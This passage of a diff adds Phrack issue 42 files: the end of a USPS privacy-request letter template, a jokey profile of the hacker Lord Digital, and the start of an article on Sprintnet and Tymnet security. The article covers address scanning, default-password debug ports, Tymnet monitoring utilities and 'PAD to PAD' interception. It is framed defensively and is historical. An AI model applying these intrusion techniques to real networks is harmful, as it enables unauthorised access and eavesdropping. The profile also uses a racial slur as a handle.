+ to the Postal Service. This information is maintained in USPS System of
+ Records 010.010.
+
+   On or about (date), I filed a change of address notice requesting that my
+ mail be forwarded from (old address) to (new address). The name that I used
+ on the change of address form was (name).
+
+   This request includes the accounting of all disclosures made by the Postal
+ Service, its contractors, and its licensees.
+
+   I am making this request because I object to the Postal Service's policy of
+ disclosing this information without giving individuals an option to prevent
+ release of this information. I want to learn how my information has been
+ disclosed and what uses have been made of it. Please let the Postmaster
+ General know that postal patrons want to have a choice in how change of
+ address information is used.
+
+   If there is a fee in excess of $5 for this information, please notify me in
+ advance. Thank you for consideration of this request.
+
+
+ Sincerely,
+
+
+
+ CC: Your Congressional Representative
+     US House of Representatives
+     Washington, DC 20510
+
+     Your Senators
+     US Senate
+     Washington, DC 20515
+
+-------------------------------------------------------------------------------
+
diff --git a/phrack42/3.txt b/phrack42/3.txt
new file mode 100644
index 0000000..fc97394
--- /dev/null
+++ b/phrack42/3.txt
@@ -0,0 +1,392 @@
+ 
+                                =Phrack Magazine=
+
+                  Volume Four, Issue Forty Two, Phile 3 of 14
+
+                              ==Phrack Pro-Phile==
+
+_______________________________________________________________________________
+
+     Phrack Pro-Phile was created to provide info to you, the users, about old
+or highly important/controversial people.  This month, we introduce you
+to an individual who has survived the underground for far too long,
+the creator of Phantom Access and one of the co-sysops of Mindvox...
+
+                                  Lord Digital
+                                  ~~~~~~~~~~~~
+_______________________________________________________________________________
+
+ Personal
+ ~~~~~~~~
+             Handle:  Lord Digital (for like.... fuck I'm old, 13 years now)
+           Call him:  Patrick K. Kroupa
+       Past handles:  M000hahahahahahahah!  You're kidding right?
+      Handle origin:  It was given to me by this ancient wise man drinking
+                      cheap Absolut by the side of the road...
+      Date of Birth:  01/20/68
+Age at current date:  24
+             Height:  6'2"
+             Weight:  185
+          Eye color:  Green
+         Hair Color:  Blonde/brunette/black (subject to change)
+           Computer:  Apple ][+, Amiga 1000, Mac Plus (All in storage)
+                      Apple //e, Amiga 500, NeXT, Various Suns (Not in storage)
+  Sysop/Co-Sysop of:  MindVox ELItE!@#!!!@#!
+        Net address:  digital@phantom.com
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     If you look beneath the shiny surface of most things, and gaze way-way-way
+deep down into the murky black festering heart of the human evolutionary
+process, you are ultimately confronted with the revelation that has stood, nay,
+LEAPT UP before the ancients since before the days of Atlantis:  Life is a lot
+like NeW WaReZ.
+
+     Anybody who tried to tell you something different, is obviously selling
+you something.
+
+     All things in this universe -- and many others -- can be attributed to New
+WareZ.  The ebb and flow of WareZ is what keeps the very COSMOS from bursting
+apart at the seams.  During periods of time when the flow of WareZ slows to a
+trickle, times are tough, there is war, pestilence, death, disease, and many
+rAg PhIleZ.  d()oDZ who were happily playing Ultima XXII Quest For Cash, are
+soon busily hurling insults at each other and dialing the Secret Service.  Life
+is grim, there is a bleak sense of desolation and emptiness . . . for when the
+WareZ slow down . . . there is little left to live for and you begin to enter
+withdrawal.  An ugly process that, thus far, has only been combatted
+successfully by Wally Hills NeW WhErEZ Treatment center, where they slowly ween
+you off the addiction of WareZ and introduce you to the REAL WORLD where you
+can do things like smoke crack and play in a band.
+
+     On the flipside, when there is a good steady flow of WaReZ, the universe
+hums to itself in happiness and all wrongs are righted, perspectives
+re-adjusted, and peace, love, and happiness spread throughout the land as the
+COSMOS re-aligns itself and perfection sweeps the world.  This is a heady time,
+but one that is sure to be brief, for before you know it some evil glimmer of
+BADNESS will rise up and somebody will DOUBLE-RELEASE someone else, or a Ware
+will CRASH when it tries to load . . . and then it's just all over.
+
+     A long time ago in a galaxy far, far away . . . I was a founding member of
+the Knights Of MysterIous keYboArdZ and the Ko0l/Ra{> alliance.  At present I
+am President/Ce0 and Chairman of the b0red at Phantom Access
+Technologies/Coleco ADAM design Studios, Inc.
+
+     At the moment our group is working on a multi-tasking, multi-user,
+CyberSpace environment where the participants can take part in a shared reality
+that is based upon a cross-relational structure comprised of lots of 0's and
+1's all strung together in big twisty chains and kept track of by an
+Objective-COBOL X/Motif GUI sitting on an SQL dialed into the POWER COMPUTER in
+Utah, at infinite baud (not to be confused with bps).
+
+     In the near future I .plan to move to Pigs Knuckle Idaho and cross-breed
+weasels with ferrets, while devoting the rest of my life to watching daytime
+TV.
+
+     It's just that type of thing.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Reality Break
+~~~~~~~~~~~~~
+
+     It is very difficult, bordering on impossible, for me to remain serious
+for longer than about 45 seconds, when discussing the "underground" and what it
+was all about.
+
+     I rarely bother to mediate or water-down most of my opinions, and there
+are a lotta places out there in the real world, where anyone who cares can
+readily access whatever I have to say.  There isn't a great deal left for me to
+convey to anybody regarding my perceptions of the hack/phreak world's history
+and what it has meant, and shall mean, in the cosmic scheme of things.
+
+     The first time I came into direct contact with computers was during the
+mid-late 70's.  I was around 6 or 7 and my father worked at NCAR during this
+period of time, which is a futuristic looking series of buildings in Boulder
+Colorado.  This one time I came in, there were all these weird cars driving
+around in the parking lot, and since there were frequently a lotta strange
+things moving around there, I never understood until much later that Woody
+Allen was filming SLEEPER when this was going on.  On the same day, I was shown
+some of the computer rooms, which had just taken shipment on one of the first
+Crays to go out the door.  This left an impression.  It was neato . . .
+
+     One thing led to another.  I played around with various things, mainly the
+really old Commodore PET systems and a slew of heavy metal junk from IBM, until
+I got an Apple ][+ in 1978.  I hung out with a group of people who were also
+starting to get into computers, most of them comprising the main attendees of
+the soon-to-be-defunct TAP meetings in NYC, a pretty eclectic collection of
+dudes who have long since gone their separate ways to meet with whatever
+destinies life had in store for them.  Around 1980 there was an Apple Fest that
+we went to, and found even more people with Apples and, from this, formed the
+Apple Mafia, which was, in our minds, really cool sounding and actually became
+the first WAreZ gRoUP to exist for the Apple ][.
+
+     Time passed, I picked up more hardware, went on the quest to assemble the
+perfect Apple-Cat system -- consisting of the Cat, 212 card, BSR, firmware,
+tone decoder chip, and all the m0dZ NOVATION eventually made to the boardZ --
+and ultimately ended up with 3 of 'em, one of which still works (like wow).
+This led to the first generation of Phantom Access programs which started to
+seep into the moDeM WeRlD around 1983, with the final revisions being let loose
+in 1987 or 1988, under the auspices of Dead Lord.  By this time I had long
+since stopped working on them and had relatively little to do with their forms
+of release.
+
+     Over the years I've been in a seemingly-endless succession of groups and
+gatherings under nearly 50 different pseudonyms which were frequently invented
+and dropped, all around that one specific timeslice and reference-point.  There
+were only two that I was ever "serious" about, which is to say I entered into
+them honestly believing the ideals and reasons for the group's inception, to be
+valid and worth upholding and being a part of.  In other words I was in my
+mid-teens and my attitude wasn't one of "Yeah yeah, take 10; a buncha dudes are
+gonna screw around, some of it will be fun, some of it will be silly, and a lot
+of it will be bitchy and cranky, but hey, I'm only here to amuse myself, so
+what the fuck . . ."  The two "serious" affiliations were Apple Mafia and the
+Knights of Shadow.  KOS ceased to exist in mid-1984 and I dropped out of the AM
+around 1985, although to my knowledge it kept going until '86 or '87 when the
+last surviving members found better things to do with their time.  In 1987 I
+was also "OfFphICiALlLY" inducted into the Fraternal Order of the Legion of
+Doom, which was just gosh w0wz0.  Actually, it's much more fun in retrospect,
+since most of us are pretty good friends at this point in time, which seemed an
+unlikely event back in the early 80's <giGgLE!!@#>
+
+     I ceased to be "active" sometime around 1985, having gained legal access
+to almost anything I could possibly want to play with, as well as having made
+friends with people working for NYNEX who de-mystified many things for me.  The
+ultimate conclusion to all of this was that having THE POWER is cool -- and
+using it to annoy people was absolutely hilarious -- but only led to two
+possible destinations.
+
+     You use it all as a learning experience and "grow up" realizing that
+you're playing cops and robbers, and many of the things you have spent years
+doing are now illegal and liable to get you into a lot of trouble.  You can't
+go back in time (at least not yet).
+
+     You could keep doing stupid things and end up in a legal dilemma over
+something that isn't very important.  Because . . . it really isn't "THE
+POWER," it's just a very limited form of "it" embodied by a phone system and
+some computers.  And when you compare that to a piece of art, or a collection
+of music, or a new series of programs that someone has created, you begin to
+realize that all you're doing is fucking with things that other people made,
+and you're wasting your time abusing . . .
+
+     To cut short my rant, I have no moral judgements to pass upon anyone or
+anything, because whatever it is that people do, it's some sort of learning
+process leading towards their destination (whether they realize it or not).
+The computer underground is just not a place where you can remain "active"
+beyond a certain period of time that serves as a sort of "rite of passage"
+towards that something else.  To hang around indefinitely and remain "active"
+is to become a criminal.
+
+     Almost everything I've done has taken place with a handful of friends who
+played various roles in events that transpired -- primary among them Dead Lord
+(Bruce Fancher), one of my closest friends for the better part of a decade, as
+well as The Unspeakable One whose name cannot be mentioned for to do so causes
+rifts within space/time, and a buncha dudes from NYC/NJ who for the most part
+want to blip their personas off the face of Cyberspace and get on with their
+lives without the specter of LaW EnForCEmEnT hanging over them for doing silly
+things as teenagers.
+
+     In 1986 I ceased calling anything and didn't access a computer that was
+hooked into a modem until late 1990.  As of late 1992, I have been "retired"
+for a little over 7 years.
+
+
+Patrick's Favorite Things
+~~~~~~~~~~~~~~~~~~~~~~~~~
+      Women:  Delia!  Gorgeous, Intelligent, Wonderful, & able to deal with me.
+        Men:  Bwooooce.
+       Cars:  928s4, Hyundai, Edsel.
+      Foods:  Italian, red meat, SuPeR Hi PER Pr0tE!n, anything with SPAM.
+      Music:  Any band with the word "LORD" in it (Lords of the New Church,
+              House of Lords, Lords of Acid, Lords of Chaos, Traci Lords).
+    Authors:  Michael Moorcock, Sun Tzu, Machiavelli, Hans Horbiger, Dr. Seuss.
+      Books:  Play of Consciousness, The Book of PAT.
+ Performers:  Bill the Cat, Sting, Perry Farrell, GuNz N RoSeZ, plus anybody
+              who has sold out to the mahnnnnnn fo' $$$$$$$ in a biiiiiig way.
+
+
+Most Memorable Experiences
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Most memorable things are unmentionable and destined to stay that way for
+a while.  Those who played the games know the stories; those who didn't
+eventually will -- but like, who cares.  Everybody should live their own
+stories, life's an interesting game . . . go play.
+
+
+Some People to Mention
+~~~~~~~~~~~~~~~~~~~~~~
+Dead Lord         - The one who is not and can never be, yet exists.  Solely an
+                    infinite layering of the possibilities inherent within
+                    personal transmigration and biotechnology?  Or alive, with
+                    flesh, blood, bone and an adornment of k0dEz & warEZ?  You
+                    must not be blinded by sight, nor fooled by what things
+                    appear to be when they are not, for what is a man when he
+                    has not the latest, nor possesses the abilities to acquire
+                    same?  This is a question perhaps best left to the wise men
+                    who roam the meadows of the ozone, forever catching the
+                    edge and surfing the waves cresting upon the seas of
+                    thought and what is, was, and shall always be.
+
+The               - I know who you are, so tell me who I am, and let's just
+   Unspeakable      get on with it okay?  Because otherwise, TV is likely to
+              One   drop the entire facility dead.  Anyone of normal caliber
+                    can see that to be entirely obvious to thee of the id'ness
+                    of pole-cats watching Star Wars.  8+ KlUb ElYtE.
+
+Terminus          - A good friend over many years who, as most people know, has
+                    recently gone through a lot.  The future looks bright, and
+                    I look forward to looking back on all this with you in
+                    another ten years.  [Look, look, looking] (haga!)
+
+Magnetic Surfer   - Neato guy who knew me way-back-when, and used to give me
+                    gNu Apple wArEz on cassette tape which he had downloaded at
+                    the lightning speed of 300 baud.  Also provided a means to
+                    meeting many of my friends, via Sherwood Forest, when it
+                    first existed and hosted Inner Circle and later KOS.
+
+The Phantom      - See above, also gave me a full set of TAP copies in 1983,
+                   which I never returned to him.
+
+The Plague        - A cool guy, close friend before his fatal accident when
+                    the truck went off the road near Poker Flats, just 5 miles
+                    north of Pig's Knuckle, ID.  Tragic, hope he's happy in
+                    his new home, far, far underground, running the world's
+                    first afterlife/subterranean BBS.
+
+ApPul HeyD! \       The elYtE peARz of Scepter/InterCHAT who went on to form
+SuperNigger  >    - DPAK, an entity SO ELITE that it required FOUR letters for
+Sharp Rem0b /       its acronym & brought the world Lex Luthor on HBO!
+
+SuperNigger       - Because he is 2 elyTe to be encompassed in merely one
+                    line and requires at least two.
+
+Lord_foul         - Ahhhh do0d....  Well we all have our roles 2 play.  Catch
+                    ya in tha outback.  (cha mod pla foul sl=999 mi=99,mh=99)
+
+Ninja NYC         - One of the few people I have ever met who seems to have
+                    mastered the art of being happy wherever he is, doing
+                    whatever he happens to be doing.  An exceptionally nice
+                    human being.
+
+Elven Wizard  \     A collection of compatriots, cohorts, and all around dudEz
+The Infiltrator\    with whom I had an inordinate amount of fun, first ro0l!ng
+The Gunslinger  > - the WhEReZ world, then changing our handles (well except
+The Bishop     /    for Jeff) & dismantling eliteness and its tarnished allure,
+The Gonif     /     along with its cadre of false prophets (namely ourselves
+                    under half a dozen other handles).
+
+Andrew \            "I doan' wannnnnnnnnt any money, I want to be left alone,
+Chase   >         - tell them to go 'way."  May Sutekh look upon our worldly
+Asif   /            endeavors and bless us all, everyone.  !nse<t01dZ ro()l!!@
+
+Paul Muad'Dib     - A lotta fun, although he never did have any new wares
+                    (unless you count source code).  In any case, I guess it's
+                    not too relative any more.
+
+Tuc               - I think it's a requirement to mention Scott; far be it from
+                    me to break with tradition.  Hi Tuc!  Thanks for the ride!
+
+Captain Avatar    - He had 'em Ahllll!  ALL of them... MORE THAN all of 'em....
+
+Napoleon Bonaparte- Nappy ran Securityland.  I called it, it was cool.  It made
+                    me smile.  I guess it made the FBI smile too.
+
+Mr. Xerox         - Mike was usually witty, sarcastic, annoying, egotistical,
+                    obnoxious, and almost always late.  We got along great
+                    and I really miss the guy sometimes.  Hullo Mike, wherever
+                    you may roam.
+
+Taran King        - BesideZ DeYd L0rD & Sn, the El1teZt Pers0[\] eYe EveR meT!
+                    StaY sP!fpHY [>o()d!
+
+Phantom Phreaker  - Here's to shifting focus and finding something far more
+                    interesting to play with than phones & computers 8-).  It's
+                    an amazing universe, huh . . .
+
+Lex Luthor        - After a ten year period during which we typed to each other
+                    once in a while and seemed situated at antipodean sides of
+                    the m0dUm Yo0n!veRsE, I finally met with Lex in the very
+                    near past.  It's shocking to find that he's actually one of
+                    the most gracious, funny, and pleasant guys I've ever had
+                    an opportunity to meet.  Best wishes in whatever you may
+                    end up doing!
+
+Erik Bloodaxe     - A keg of Sandoz, a Vat of pig's blood, T&C and thee.
+
+Sigmund!@31!@!!!  - As the UFOs said, they know who you are, they know where
+                    you are.  Seriously, hey, it was entertaining.  Good luck
+                    man.
+
+
+unReAl PeOpUL 2 MenShun
+~~~~~~~~~~~~~~~~~~~~~~~
+StJude  -  For everything.  It's good to know you . . . love, light, and a
+           lotta deep-fried giri with ciphers thrown in.
+
+Siva    -  Look, polygons or voxels, Gibsonian or Post-modern, by Risc or by
+           Cisc with Objective C++ running Smalltalk under Windows NT over the
+           underpass and around the bend; it's gonna happen, and we're gonna be
+           there having a party.  Smile, as I think you've mentioned on more
+           than one occasion; it's an interesting time to be alive 8-).
+
+Bruce   -  Quite possibly the coolest grown-up I have ever met 8-).  Which is
+Sterling   saying a lot.  The world would be a much better place if Bruce
+           could be cloned and then placed inside a tornado, hooked into a
+           net, fitted with an adamantium exoskeleton, and then dropped into
+           the de-criminalized zone with a BigMac and a holographic tape
+           recorder.
+
+Jim     -  Hey so, are you doing more things at once or am I?  I bet I can
+Thomas     watch TV, listen to music, have three phone conversations, and
+           write an article with 25% greater coherence than Chuck has while
+           eating and watching TV.  On the other hand, writing two books,
+           teaching, reading, running CUD, having a life, and still finding
+           time to hang out are at least level 15 -- haven't hit that yet,
+           but I'm working on it!
+
+Andy    -  Hey man.  I enjoy what you're doing, keep the faith, ignore the
+Hawks      assholes, take inspiration from the inspired, and retain belief
+           in your dreams.  Oh okay, gotta go, time to sell out, ignore what I
+           just said 8-).
+
+3Jane   -  Models/actresses/sex cadets united for a better tomorrow, under
+           Unix with named_pipes and justice for some of us.
+
+
+Memorable Phreak/Hack BBSes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+8BBS - Long ago, I didn't understand it, or what I was typing, but it was fun.
+MOM - Long ago, although by now I did understand it and had slightly less fun.
+Pirate's Harbor - Before Norman figured out he could make a killing on TIMECOR.
+Pirate's Chest - 6 line 80 meg board circa 1983.  Totally Cool.
+Adventurer's Tavern - Last bastion of tremendous on-line fun & anarchy.  RIP.
+Securityland - Nappy's Board.
+Pirate's Phunhouse -> Cat's Cavern - The Tempest's system(s).
+Dark Side of the Moon - Through many long and strange phases.  Still running.
+RACS III - w()wZ0 blargel blumpfk0l SwillY sw()nk!@!#!@!!!!!
+OSUNY (3 cycles) - Some more fun than others.
+Sherwood Forest I, II, III - Liked all three, although 1 was the coolest.
+Plovernet - Two phases.  Both great.
+The (urse - WarEZ do()d & eLIteNEsS Galore!@#!@#!@#!@#
+LOD - The Start in 1984, and intermittently thereafter.
+COPS - Cool Florida board.
+Shadowland - Cool Colorado board.
+SpecELITE - So overwhelmingly awful, that it was wonderfully fun.
+WOPR - Lotta fun for a while, then he threw everyone off & went 1200only wareZ.
+Pirate-80 - It was very effervescent with a touch of jello.
+Everything Sir Knight ever ran - Too many names (Tele-Apa, HackNet, NewsNet...)
+World of Cryton - WOC!  JAMES!  ELITENESS!
+The Safehouse - Apple Bandit's.  Hey, I want my Diskfer ][ dude!
+Farmers of Doom - Blo0p.
+Pirates of Puget Sound - Nice softwareZ.  Lotta fun.
+
+
+A few things Lord Digital would like to say:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+BELIEVE EVERYTHING THAT YOU HEAR.  KNOW EVERYTHING YOU SEE. UNDERSTAND
+EVERYTHING YOU DO NOT COMPREHEND.  BE AT ONE WITH THE STILLNESS OF THE
+REVOLVING HAMSTER WHEEL AND FLOSS BETWEEN MEALS.
+
+As far as the future of the hack/phreak world and telecommunications in general
+is concerned, the PhrAck World is absolutely spiffy and I believe that ISDN
+will change EVERYTHING and make it rounder, taller, bigger, more stable, and
+also give later generations something to look back upon and sneer at with
+contempt.
diff --git a/phrack42/4.txt b/phrack42/4.txt
new file mode 100644
index 0000000..f880a19
--- /dev/null
+++ b/phrack42/4.txt
@@ -0,0 +1,480 @@
+                         ==Phrack Magazine==
+
+             Volume Four, Issue Forty-Two, File 4 of 14
+
+                          Prelude to a Kiss
+
+    - Lessons Unlearned Are Doomed To Bring Misery Ad-Infinitum -
+
+
+The following is an article I wrote for a mainstream computer security
+periodical called ISPNews.  At the time, I had been discussing the idea
+of a bi-monthly column with the editor at that time, Len Spitz. (Now the
+editor is Michael Alexander, ex-of Computerworld)
+
+The following article, although very, very tame by my standards, and
+admittedly lacking in enough hardcore information to help security
+professionals to apply a quick fix to their many problems, caused quite
+a stir among the folks at ISPNews.
+
+Since this article was from me, a self-proclaimed hacker, it
+underwent an extraordinary amount of scrutiny.  Rather than be
+accepted or denied by the editor, my article got the dubious honor of
+being sent before an editorial advisory board.  I checked every back
+issue of ISPNews and could find no mention of such an entity until the
+November/December 1991 issue, the issue immediately following an length
+interview with none other than myself.
+
+When I questioned Len Spitz about this rather odd fact, he maintained
+that this committee had indeed existed, but stammered his way through my
+question to name any other article that they had convened to judge in
+the past, and to explain the duties of such a group.  He could not give
+me any answers.
+
+The group itself was obviously geared to be a type of kangaroo-court.
+It consisted of:
+
+William J. Cook -- The man who less than two years prior had ordered my
+                   privacy and civil rights violated by the Secret
+                   Service solely on the basis of two bulletin board
+                   posts and my association with members of the Legion
+                   of Doom and the Phrack Magazine staff.
+
+William H. Murray -- A senior consultant with Deloitte & Touche who had
+                     two weeks prior stood up before my presentation to
+                     the MIS Training Institute's 11th Annual Conference
+                     and said loudly "I can't take this any more, I'm leaving,"
+                     to the astounded audience.  The man who went on to
+                     state in his own column in ISPNews, "Can we lie
+                     down with dogs and get up without fleas?"  and "Ask
+                     yourself if you wish to work in a profession
+                     populated by rogues.  Ask yourself if you want your
+                     reputation mixed with theirs."
+
+Winn Schwartau -- A security consultant with a broad view and an open
+                  mind, undoubtedly resulting from his background in the
+                  music industry, as opposed to the bean-counting world
+                  of MIS.
+
+David J. Stang -- Director of research, NCSA.  Noted virus specialist.
+
+This was the group.  Here is what they said about my article:
+
+Bill Cook --  "It's very well-written and informative, but shouldn't be
+published for legal reasons."  (What those reasons might have been were
+not stated, nor did Mr. Cook return my call to his office.)
+
+Bill Murray -- Was not even given the file to read, as his response was
+deemed to predictable.
+
+Winn Schwartau -- "Publish it.  This is valuable information."
+
+David Stang -- Was not given the file because, according to Len Spitz
+"David is just a virus expert, and this isn't in his arena, so we gave
+it to Ray Kaplan."
+
+    Ray Kaplan -- Did not want to comment on it because he said, "It's
+    not my expertise, so I gave it to a friend."  I believe Ray did not
+    want to get involved with anything having to do with hackers after
+    the reactionary attitudes of the DECUS attendees towards his defense
+    of Kevin Mitnik that nearly left him in bankruptcy.  I cannot blame
+    him at all.  (Hell, I like the guy...he's certainly more brazen with
+    attitude these days, I mean, he went to HoHoCon for God's-sake!)
+
+      Ray's Friend -- "This is of absolutely no use to the information
+      security professional, but of great use to the hacker community."
+      I still do not know who Ray's "friend" was.  I hope his
+      Alzeheimer's has subsided since this comment.
+
+Needless to say, the article went unpublished.
+
+Shortly thereafter I received a letter from Robert Fox, an assistant
+vice-president at Sprint.  Somehow my little article had snaked its
+way over to Kansas City.  It's amazing how one faxed copy of an article
+could have reached so many people in such a short period of time.
+Mr. Fox had the following to say:
+
+------------------------------------------------------------------------
+
+United Telecom/US Sprint
+9221 Ward Parkway
+Kansas City, Missouri 64114
+816-822-6262
+
+Robert F. Fox                                     January 13, 1992
+Assistant Vice President
+Corporate Security
+
+
+VIA AIRBORNE EXPRESS
+
+Mr. Chris Goggans
+COMSEC
+Suite 1470
+7322 Southwest Freeway
+Houston, TX 77074
+
+    Re:  Your Article "Packet-switched Networks
+          Security Begins With Configuration"
+
+Dear Mr. Goggans:
+
+    A copy of the referenced unpublished article, which is
+enclosed with this letter, has come to our attention.  After
+review, we believe the article is inaccurate and libelous.  If
+published the contents of the article could cause damage to Sprint
+customers, Sprint and our reputation, and we request that you not
+publish or otherwise disseminate it.
+
+     In addition, we believe some of the information contained in
+the article has been obtained through violation of the property
+rights of Sprint and/or our customers and we demand that you cease
+any efforts or attempts to violate or otherwise compromise our
+property whether or not for you personal financial gain.
+
+                        Sincerely,
+
+                        Robert F. Fox
+
+
+Enclosure
+
+
+------------------------------------------------------------------------
+
+
+Regardless of how Mr. Fox came into possession of this article, i have to
+question his letter based on his comments.   First he states that
+the information is almost criminally incorrect and could cause harm to
+Sprint's reputation.  Then he states that information in the article has
+come to be known through the violation of the security of Sprintnet and/or
+clients of Sprintnet.  In effect, I am both a thief and a liar according
+to Mr. Fox.  Well, if I were a thief the information could not possibly
+be inaccurate if it were obtained from Sprintnet or its clients.  If I
+was a liar, why would they think the information came from themselves
+and/or their clients?  Mr. Fox's thinly veiled threat caused me great
+amusement.
+
+I then decided no mainstream publication would touch this article.  I
+don't know why everyone is so scared of the truth.  Perhaps if the truth
+were known people would have to work, and perhaps if the truth were
+known some people would be out of work.  None of this is of concern to
+me anymore.  I am here to speak the truth and to provide uncensored
+information gathered from a variety of sources to provide readers of
+this magazine the facts they need to quench their thirst for knowledge.
+
+This article is included as a prelude to a series of articles all based
+on packet switched networks as related to information merely alluded to
+in my harmless little article.  To our readers, "enjoy."  To the cowering
+so-called security experts, "kiss my ass."
+
+------------------------------------------------------------------------
+
+Packet-switched Networks
+
+Security Begins with Configuration
+
+
+For many companies the use of packet-switched networks has
+allowed for increased interconnectivity of systems and easy
+remote access.  Connection to a major public packet-switched
+network brings increased access points with local dialups in
+many cities around the nation as well as access
+points from foreign countries.
+
+With the many obvious benefits provided by this service,
+improper configuration of either the host's connection to the
+network or of the network itself can lead to extreme security
+problems.
+
+The very connection to a public packet-switched network
+immediately increases the exposure of that particular system.
+America's two major commercial networks, BT-Tymnet and
+Sprintnet, are probably the most popular US targets for hackers
+around the world.  The wealth of systems available on
+these two networks has provided hackers with a seemly endless
+supply of sites on which to sharpen their skills.  The ease of use
+inherent in both networks makes them popular for legitimate
+users as well as illegitimate users.
+
+The Telenet software utilized in the Sprintnet network allows
+users to enter a network user address (NUA) in the standard
+format as outlined in the X.121 numbering standard:
+
+DDDDAAAHHHHHPP
+
+Where D = the four digit data network identifier code (DNIC)
+      A = the three digit area code corresponding to the host
+      H = the host address
+      P = the port or (sub) address
+
+On domestic calls the DNIC for Sprintnet (3110) is stored in
+all Sprintnet equipment and is used as the default.  By
+merely picking an area code, most often corresponding to the standard
+area codes of the North American Numbering Plan, and an
+additional one to five digits a would-be intruder can
+connect to any number of systems while looking for targets.
+
+In the past many software packages have been written to
+automate this process, and large scans of the network have
+been published in a variety of underground media.
+
+The Tymnet II software utilized in BT's Tymnet
+prompts the user for a mnemonic which corresponds to a host
+or number of hosts.  The mnemonic, or username, is referenced
+to a fixed host address in the network's Master User
+Directory (MUD).  This username may allow the caller to
+connect to a variety of sites, as opposed to merely one, by
+entering additional information in separate fields after the username.
+It may also correspond to a network gateway thereby allowing
+the user to enter a number in the X.121 format and connect to that
+specific site.
+
+This particular network, with its primary use of words as
+opposed to numbers, has been compromised by intruders who
+guess common words or names in their attempts to connect to
+remote sites.
+
+Each network has its own particular set of problems but
+solutions to these problems are both simple and quick in
+implementation.
+
+SPRINTNET
+
+The first deterrence in securing a host on this
+network is to restrict access to the site.  This can be
+accomplished in a number of ways.  The most obvious is to
+have the site refuse collect calls.  All calls on Sprintnet
+are reverse-billed, unless the site has specifically asked
+that they not be billed for incoming calls.  This makes the
+site accessible only through the use of a Network User
+Identifier (NUI).
+
+Another method of restricting access from intruders is to
+place the host in a closed user group (CUG).  By electing to
+have the host in a CUG, the administrator can allow only
+certain NUIs to connect, and can also restrict the actual
+addresses from which access is allowed.  For example:  A site
+is placed in a CUG that will allow only calls from the
+company's remote branch in Dallas to access the host and only
+with the NUI created specifically for that branch.  All
+attempts to access the site from an address outside the 214
+area will result in an error message indicating an invalid
+source address.  All attempts to connect with an invalid NUI
+will result in an error indicating an invalid ID.  This
+information is maintained in the networks main TAMS (TP
+Access Management System) database, and is not subject to
+manipulation under normal circumstances.
+
+Many sites on the Sprintnet network have specific
+subaddresses connecting to a debug port.  This is usually at
+subaddress 99.  All connections to debug ports should be
+restricted.  Allowing users access to this port will allow
+them the ability to load and display memory registers of the
+Sprintnet equipment connected to the port, and even reset
+as well as enable or disable the host.  Most debug ports are
+equipped with preset passwords from the vendor, but should be
+changed.  These ports should also restrict connection from
+all addresses except those specified by the company.
+
+An additional measure that may foil intruders relying on
+software programs to find all addresses in a given area code
+is to request that the host be given an address above 10000.
+The time involved in scanning the network is extensive and
+most casual intruders will not look past the 10000 range.  In
+fact, many will not venture past 2000.
+
+BT-TYMNET
+
+Any company having a host on the Tymnet network should choose
+a username that is not easily associated with the company or
+one that is not a common word or name.  If an intruder is aware that
+XYZ Inc. has a UNIX based system on TYMNET he or she would
+begin attempts to find this system with the obvious
+usernames:  XYZ, XYZINC, XYZNET, XYZ1, XYZUNIX, UNIX, etc.
+
+BT-Tymnet allows for these usernames to have additional
+password security as well.  All hosts should have this option
+enabled, and passwords should be changed frequently.
+The password should always be a minimum of six
+digits, should include letters, numbers and at least one symbol
+character, and should not be associated in any way with the
+corresponding username.
+
+Many clients of BT-Tymnet have purchased the Tymnet II
+software and have individual sub-networks that are linked to
+the public network through gateways.  Each subnet is
+personally configured and maintained through the use of a
+package of utilities provided by Tymnet.  These utilities
+each perform a specific task and are highly important to the
+smooth operation of the network.  These utilities may be
+accessed either directly from the host-end or remotely
+through the network by entering a corresponding username.
+Some of these utilities are:
+
+XRAY : a monitoring utility
+DDT : a debugging utility
+NETVAL : a database of username to host correspondence
+PROBE : a monitoring utility
+TMCS : a monitoring utility
+
+Under NO CIRCUMSTANCES should these utilities be left
+without a password on the company's subnet.  These utilities should
+also never be named similarly to their given name.  Should an
+intruder gain access to any of these utilities the integrity
+of your network will be at risk.
+
+For example:
+
+Allowing an outsider access to the XRAY utility, would give
+he or she the ability to monitor both incoming and outgoing
+data from the host using the "TA" command (display trace data
+table in ASCII).  Use of certain XRAY commands are restricted
+by a security function that allows only certain usernames to
+execute commands on the basis of their existence in a
+"Goodguy" list, which can be displayed by any XRAY user.
+Should a user be of the highest privilege, (2), he or she can
+add or delete from the "Goodguy" list, reset connections, and
+display trace data on channels other than the default
+channel.
+
+Allowing a user access to DDT can result in complete
+disruption of the network.  DDT allows the user the ability
+to write directly to the network controller "node code" and
+alter its configuration.
+
+Allowing a user access to NETVAL will allow the user to
+display all usernames active on the network and the
+corresponding host addresses.
+
+OTHER PROBLEMS
+
+EXAMPLE ONE
+
+On many networks users have the ability to connect to the
+packet assembler/disassembler (PAD) of the network dial-ups.
+This has led to significant problems in the past.
+
+In the mid-1980's two American hackers were exploring the
+German packet network DATEX-P.  One connected to a host in
+Berlin and was immediately disconnected by the remote site.
+Before the hacker could react, the German host connected to
+the NUA corresponding to his Sprintnet PAD and sent him a
+login prompt.  This alarmed the hacker greatly, as he assumed
+that the proprietors of the German host had somehow noticed
+his attempt to access their system.  He contacted his partner
+and told him of the occurrence.  The two concluded that since
+the NUA of the origination point is sent in the packet-header,
+the remote site must have been programed to recognize the NUA and
+then return the call.  The fact that it had returned a call to a
+public PAD was intriguing to the pair, so they decided to
+attempt to recreate the event by calling each other.  Both
+individuals connected to the network and one entered the NUA
+corresponding to the others PAD.  A connection resulted and
+the two were able to interact with one another.  They then
+decided that they would periodically meet in this fashion and
+discuss their findings from Germany.  At the time of the next
+meeting, the connection did not occur as planned.  One hacker
+quickly received a telephone call from the second who
+exclaimed rather excitedly that he had attempted to connect
+to his partner as planned, but accidentally connected to
+another PAD and intercepted a legitimate user typing his NUI.
+Further investigation proved that one could connect to public
+PADs during the idle period when the user was in network
+mode, prior to making a connection to a remote site.  This
+discovery was intended to remain secret, because of its
+extremely dangerous applications.  Nevertheless, word of this
+discovery soon reached the entire hacker community and what
+came to be known as "PAD to PAD" was born.
+
+The "PAD to PAD" technique became so wide-spread that hackers
